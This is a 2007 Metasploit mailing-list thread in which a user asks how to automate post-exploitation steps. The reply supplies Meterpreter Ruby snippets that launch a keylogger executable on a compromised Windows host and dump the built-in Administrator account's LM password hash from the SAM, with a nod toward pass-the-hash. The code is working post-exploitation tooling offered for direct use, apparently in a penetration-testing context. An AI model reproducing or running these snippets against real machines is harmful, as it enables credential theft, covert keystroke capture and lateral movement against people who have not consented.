[framework] Meterpreter AutoExec?

Jerome Athias jerome.athias at free.fr
Sat Nov 10 07:57:57 CST 2007


Hi,

the design of Meterpreter lets you do this sort of thing in an easy 
way: the Meterpreter scripts! (thanks to The Alien ;-p)
Look at /scripts/meterpreter/; you'll find the migrate.rb script you need.

Then, to launch a new process, you'll use something like:

# start the program on the target and wait until that process has exited
myproc = client.sys.process.execute("C:\\keylog.exe", "/S")
finished = false
until finished
    sleep 5
    # collect the pids of everything currently running on the target
    pid_list = client.sys.process.processes().collect { |x| x["pid"] }
    # the launched process is gone from the list once it has finished
    finished = true unless pid_list.include?(myproc.pid)
end
print_status("Keylog installed")

To dump the LM hash of the Administrator account, use:

client.core.use("priv")   # load the priv extension, which provides sam_hashes
adm_name = nil
adm_lanman = nil
client.priv.sam_hashes.each do |h|
    # RID 500 is the built-in Administrator account
    if h.user_id == "500"
       adm_name = h.user_name
       adm_lanman = h.lanman
    end
end
if adm_name.nil?
    print_status("No account with RID 500 found in the SAM")
else
    print_status("LM hash for " + adm_name + " is " + adm_lanman)
end
# pass-the-hash anyone?

Then, ... just be creative & innovative!

My 2 euro cents
/JA
www.securinfos.info

Best regards to VV & the folks of MISC (don't forget about my website 
guys ;-))

CybyDude wrote:
> Hi List!
>
> Does Meterpreter support some sorta AutoExec script that can be executed post 
> exploitation? I understand this sort of thing'd be possible through Ruby 
> Scripts using MSF/Meterpreter API. But does MSF specifically look for 
> something like autoexec (like AUTOEXEC.BAT in good old DOS)?
>
> Basically, I'm interested in automating post exploitation measures for client 
> side attacks, which may include:
>
> 1-Migration of Process to something safe before user terminates IE/OE/FF
> 2-Dump Hashes
> 3-Upload, deploy & init custom stuff like a key logger
> 4-Dash off a mail to the pentester about the vulnerable machine.
>
> Could someone please guide me in this regard?
>
>
> Regards n' Best Wishes
> CybyDude